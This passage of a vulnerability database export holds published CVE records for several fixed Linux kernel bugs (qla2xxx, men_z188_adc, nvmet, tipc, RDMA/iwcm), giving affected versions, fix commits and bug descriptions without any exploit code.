"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.2.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Complete command early within lock\n\nA crash was observed while performing NPIV and FW reset,\n\n BUG: kernel NULL pointer dereference, address: 000000000000001c\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 1 PREEMPT_RT SMP NOPTI\n RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0\n RSP: 0018:ffffc90026f47b88 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000002\n RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8881041130d0\n RBP: ffff8881041130d0 R08: 0000000000000000 R09: 0000000000000034\n R10: ffffc90026f47c48 R11: 0000000000000031 R12: 0000000000000000\n R13: 0000000000000000 R14: ffff8881565e4a20 R15: 0000000000000000\n FS: 00007f4c69ed3d00(0000) GS:ffff889faac80000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000001c CR3: 0000000288a50002 CR4: 00000000007706e0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n ? __die_body+0x1a/0x60\n ? page_fault_oops+0x16f/0x4a0\n ? do_user_addr_fault+0x174/0x7f0\n ? exc_page_fault+0x69/0x1a0\n ? asm_exc_page_fault+0x22/0x30\n ? dma_direct_unmap_sg+0x51/0x1e0\n ? preempt_count_sub+0x96/0xe0\n qla2xxx_qpair_sp_free_dma+0x29f/0x3b0 [qla2xxx]\n qla2xxx_qpair_sp_compl+0x60/0x80 [qla2xxx]\n __qla2x00_abort_all_cmds+0xa2/0x450 [qla2xxx]\n\nThe command completion was done early while aborting the commands in driver\nunload path but outside lock to avoid the WARN_ON condition of performing\ndma_free_attr within the lock. However this caused race condition while\ncommand completion via multiple paths causing system crash.\n\nHence complete the command early in unload path but within the lock to\navoid race condition."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:56.164Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/af46649304b0c9cede4ccfc2be2561ce8ed6a2ea"
},
{
"url": "https://git.kernel.org/stable/c/57ba7563712227647f82a92547e82c96cd350553"
},
{
"url": "https://git.kernel.org/stable/c/9117337b04d789bd08fdd9854a40bec2815cd3f6"
},
{
"url": "https://git.kernel.org/stable/c/814f4a53cc86f7ea8b501bfb1723f24fd29ef5ee"
},
{
"url": "https://git.kernel.org/stable/c/314efe3f87949a568f512f05df20bf47b81cf232"
},
{
"url": "https://git.kernel.org/stable/c/36fdc5319c4d0ec8b8938ec4769764098a246bfb"
},
{
"url": "https://git.kernel.org/stable/c/4475afa2646d3fec176fc4d011d3879b26cb26e3"
}
],
"title": "scsi: qla2xxx: Complete command early within lock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42287",
"datePublished": "2024-08-17T09:08:52.762Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T12:57:56.164Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48928 (GCVE-0-2022-48928)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iio: adc: men_z188_adc: Fix a resource leak in an error handling path
If iio_device_register() fails, a previous ioremap() is left unbalanced.
Update the error handling path and add the missing iounmap() call, as
already done in the remove function.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca Version: 74aeac4da66fbfa246edbfc849002eac9b5af9ca |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48928",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:32:59.448093Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:00.362Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/men_z188_adc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0f88722313645a903f4d420ba61ddc690ec2481d",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "c5723b422f564af15f2e3bc0592fd6376a0a6c45",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "53d43a9c8dd224e66559fe86af1e473802c7130e",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "ce1076b33e299dc8d270e4450a420a18bfb3e190",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "1aa12ecfdcbafebc218910ec47acf6262e600cf5",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "fe73477802981bd0d0d70f2b22f109bcca801bdb",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "d6ed5426a7fad36cf928c244483ba24e72359638",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
},
{
"lessThan": "e0a2e37f303828d030a83f33ffe14b36cb88d563",
"status": "affected",
"version": "74aeac4da66fbfa246edbfc849002eac9b5af9ca",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/men_z188_adc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.15"
},
{
"lessThan": "3.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.9.*",
"status": "unaffected",
"version": "4.9.304",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.232",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.182",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.9.304",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.269",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.232",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.182",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "3.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "3.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: men_z188_adc: Fix a resource leak in an error handling path\n\nIf iio_device_register() fails, a previous ioremap() is left unbalanced.\n\nUpdate the error handling path and add the missing iounmap() call, as\nalready done in the remove function."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:16.689Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0f88722313645a903f4d420ba61ddc690ec2481d"
},
{
"url": "https://git.kernel.org/stable/c/c5723b422f564af15f2e3bc0592fd6376a0a6c45"
},
{
"url": "https://git.kernel.org/stable/c/53d43a9c8dd224e66559fe86af1e473802c7130e"
},
{
"url": "https://git.kernel.org/stable/c/ce1076b33e299dc8d270e4450a420a18bfb3e190"
},
{
"url": "https://git.kernel.org/stable/c/1aa12ecfdcbafebc218910ec47acf6262e600cf5"
},
{
"url": "https://git.kernel.org/stable/c/fe73477802981bd0d0d70f2b22f109bcca801bdb"
},
{
"url": "https://git.kernel.org/stable/c/d6ed5426a7fad36cf928c244483ba24e72359638"
},
{
"url": "https://git.kernel.org/stable/c/e0a2e37f303828d030a83f33ffe14b36cb88d563"
}
],
"title": "iio: adc: men_z188_adc: Fix a resource leak in an error handling path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48928",
"datePublished": "2024-08-22T03:31:21.098Z",
"dateReserved": "2024-08-21T06:06:23.298Z",
"dateUpdated": "2025-05-04T08:26:16.689Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42152 (GCVE-0-2024-42152)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-06-19 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix a possible leak when destroy a ctrl during qp establishment
In nvmet_sq_destroy we capture sq->ctrl early and if it is non-NULL we
know that a ctrl was allocated (in the admin connect request handler)
and we need to release pending AERs, clear ctrl->sqs and sq->ctrl
(for nvme-loop primarily), and drop the final reference on the ctrl.
However, a small window is possible where nvmet_sq_destroy starts (as
a result of the client giving up and disconnecting) concurrently with
the nvme admin connect cmd (which may be in an early stage). But *before*
kill_and_confirm of sq->ref (i.e. the admin connect managed to get an sq
live reference). In this case, sq->ctrl was allocated however after it was
captured in a local variable in nvmet_sq_destroy.
This prevented the final reference drop on the ctrl.
Solve this by re-capturing the sq->ctrl after all inflight request has
completed, where for sure sq->ctrl reference is final, and move forward
based on that.
This issue was observed in an environment with many hosts connecting
multiple ctrls simoutanuosly, creating a delay in allocating a ctrl
leading up to this race window.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a Version: 0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.370Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2f3c22b1d3d7e86712253244797a651998c141fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4fed1443a6571d49c6ffe7d97af3bbe5ee6dff5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/940a71f08ef153ef807f751310b0648d1fa5d0da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5502c1f1d0d7472706cc1f201aecf1c935d302d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/818004f2a380420c19872171be716174d4985e33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c758b77d4a0a0ed3a1292b3fd7a2aeccd1a169a4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42152",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:21.603444Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:34.451Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2f3c22b1d3d7e86712253244797a651998c141fa",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
},
{
"lessThan": "b4fed1443a6571d49c6ffe7d97af3bbe5ee6dff5",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
},
{
"lessThan": "940a71f08ef153ef807f751310b0648d1fa5d0da",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
},
{
"lessThan": "5502c1f1d0d7472706cc1f201aecf1c935d302d1",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
},
{
"lessThan": "818004f2a380420c19872171be716174d4985e33",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
},
{
"lessThan": "c758b77d4a0a0ed3a1292b3fd7a2aeccd1a169a4",
"status": "affected",
"version": "0f5be6a4ff7b3f8bf3db15f904e3e76797a43d9a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet: fix a possible leak when destroy a ctrl during qp establishment\n\nIn nvmet_sq_destroy we capture sq-\u003ectrl early and if it is non-NULL we\nknow that a ctrl was allocated (in the admin connect request handler)\nand we need to release pending AERs, clear ctrl-\u003esqs and sq-\u003ectrl\n(for nvme-loop primarily), and drop the final reference on the ctrl.\n\nHowever, a small window is possible where nvmet_sq_destroy starts (as\na result of the client giving up and disconnecting) concurrently with\nthe nvme admin connect cmd (which may be in an early stage). But *before*\nkill_and_confirm of sq-\u003eref (i.e. the admin connect managed to get an sq\nlive reference). In this case, sq-\u003ectrl was allocated however after it was\ncaptured in a local variable in nvmet_sq_destroy.\nThis prevented the final reference drop on the ctrl.\n\nSolve this by re-capturing the sq-\u003ectrl after all inflight request has\ncompleted, where for sure sq-\u003ectrl reference is final, and move forward\nbased on that.\n\nThis issue was observed in an environment with many hosts connecting\nmultiple ctrls simoutanuosly, creating a delay in allocating a ctrl\nleading up to this race window."
}
],
"providerMetadata": {
"dateUpdated": "2025-06-19T12:56:36.697Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2f3c22b1d3d7e86712253244797a651998c141fa"
},
{
"url": "https://git.kernel.org/stable/c/b4fed1443a6571d49c6ffe7d97af3bbe5ee6dff5"
},
{
"url": "https://git.kernel.org/stable/c/940a71f08ef153ef807f751310b0648d1fa5d0da"
},
{
"url": "https://git.kernel.org/stable/c/5502c1f1d0d7472706cc1f201aecf1c935d302d1"
},
{
"url": "https://git.kernel.org/stable/c/818004f2a380420c19872171be716174d4985e33"
},
{
"url": "https://git.kernel.org/stable/c/c758b77d4a0a0ed3a1292b3fd7a2aeccd1a169a4"
}
],
"title": "nvmet: fix a possible leak when destroy a ctrl during qp establishment",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42152",
"datePublished": "2024-07-30T07:46:44.795Z",
"dateReserved": "2024-07-29T15:50:41.193Z",
"dateUpdated": "2025-06-19T12:56:36.697Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42284 (GCVE-0-2024-42284)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tipc: Return non-zero value from tipc_udp_addr2str() on error
tipc_udp_addr2str() should return non-zero value if the UDP media
address is invalid. Otherwise, a buffer overflow access can occur in
tipc_media_addr_printf(). Fix this by returning 1 on an invalid UDP
media address.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 Version: d0f91938bede204a343473792529e0db7d599836 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42284",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:26.639456Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tipc/udp_media.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7ec3335dd89c8d169e9650e4bac64fde71fdf15b",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "253405541be2f15ffebdeac2f4cf4b7e9144d12f",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "aa38bf74899de07cf70b50cd17f8ad45fb6654c8",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "5eea127675450583680c8170358bcba43227bd69",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "728734352743a78b4c5a7285b282127696a4a813",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "76ddf84a52f0d8ec3f5db6ccce08faf202a17d28",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "2abe350db1aa599eeebc6892237d0bce0f1de62a",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
},
{
"lessThan": "fa96c6baef1b5385e2f0c0677b32b3839e716076",
"status": "affected",
"version": "d0f91938bede204a343473792529e0db7d599836",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tipc/udp_media.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Return non-zero value from tipc_udp_addr2str() on error\n\ntipc_udp_addr2str() should return non-zero value if the UDP media\naddress is invalid. Otherwise, a buffer overflow access can occur in\ntipc_media_addr_printf(). Fix this by returning 1 on an invalid UDP\nmedia address."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:55.793Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7ec3335dd89c8d169e9650e4bac64fde71fdf15b"
},
{
"url": "https://git.kernel.org/stable/c/253405541be2f15ffebdeac2f4cf4b7e9144d12f"
},
{
"url": "https://git.kernel.org/stable/c/aa38bf74899de07cf70b50cd17f8ad45fb6654c8"
},
{
"url": "https://git.kernel.org/stable/c/5eea127675450583680c8170358bcba43227bd69"
},
{
"url": "https://git.kernel.org/stable/c/728734352743a78b4c5a7285b282127696a4a813"
},
{
"url": "https://git.kernel.org/stable/c/76ddf84a52f0d8ec3f5db6ccce08faf202a17d28"
},
{
"url": "https://git.kernel.org/stable/c/2abe350db1aa599eeebc6892237d0bce0f1de62a"
},
{
"url": "https://git.kernel.org/stable/c/fa96c6baef1b5385e2f0c0677b32b3839e716076"
}
],
"title": "tipc: Return non-zero value from tipc_udp_addr2str() on error",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42284",
"datePublished": "2024-08-17T09:08:50.576Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T09:25:55.793Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42285 (GCVE-0-2024-42285)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/iwcm: Fix a use-after-free related to destroying CM IDs
iw_conn_req_handler() associates a new struct rdma_id_private (conn_id) with
an existing struct iw_cm_id (cm_id) as follows:
conn_id->cm_id.iw = cm_id;
cm_id->context = conn_id;
cm_id->cm_handler = cma_iw_handler;
